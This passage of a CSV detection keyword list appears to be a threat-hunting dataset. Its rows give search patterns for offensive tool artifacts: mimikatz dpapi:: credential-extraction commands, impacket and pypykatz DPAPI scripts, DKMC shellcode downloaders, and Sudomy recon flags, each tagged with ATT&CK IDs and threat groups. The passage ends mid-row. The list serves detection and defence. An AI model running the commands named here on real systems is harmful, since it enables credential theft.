"*downloadshellcodebin.c*",".{0,1000}downloadshellcodebin\.c.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","41493" "*downloadshellcodebin.exe*",".{0,1000}downloadshellcodebin\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense 
Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","41494" "*DownloadString*https://checkip.amazonaws.com*",".{0,1000}DownloadString.{0,1000}https\:\/\/checkip\.amazonaws\.com.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41495" "*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*",".{0,1000}\-dP\s\-eP\s\-rS\s\-cF\s\-pS\s\-tO\s\-gW\s\-\-httpx\s\-\-dnsprobe\s\s\-aI\swebanalyze\s\-sS.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","#linux","N/A","10","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","41496" "*dpapi.py*",".{0,1000}dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41498" "*dpapi/decryptor.py*",".{0,1000}dpapi\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","41499" "*dpapi::blob*",".{0,1000}dpapi\:\:blob.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41500" "*dpapi::cache*",".{0,1000}dpapi\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41501" "*dpapi::capi*",".{0,1000}dpapi\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41502" "*dpapi::chrome*",".{0,1000}dpapi\:\:chrome.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41503" "*dpapi::cloudapkd*",".{0,1000}dpapi\:\:cloudapkd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41504" "*dpapi::cloudapreg*",".{0,1000}dpapi\:\:cloudapreg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41505" "*dpapi::cng*",".{0,1000}dpapi\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41506" "*dpapi::create*",".{0,1000}dpapi\:\:create.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41507" "*dpapi::cred*",".{0,1000}dpapi\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41508" "*dpapi::credhist*",".{0,1000}dpapi\:\:credhist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41509" "*dpapi::luna*",".{0,1000}dpapi\:\:luna.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41510" "*dpapi::masterkey*",".{0,1000}dpapi\:\:masterkey.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41511" "*dpapi::protect*",".{0,1000}dpapi\:\:protect.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41512" "*dpapi::ps*",".{0,1000}dpapi\:\:ps.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41513" "*dpapi::rdg*",".{0,1000}dpapi\:\:rdg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41514" "*dpapi::sccm*",".{0,1000}dpapi\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41515" "*dpapi::ssh*",".{0,1000}dpapi\:\:ssh.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
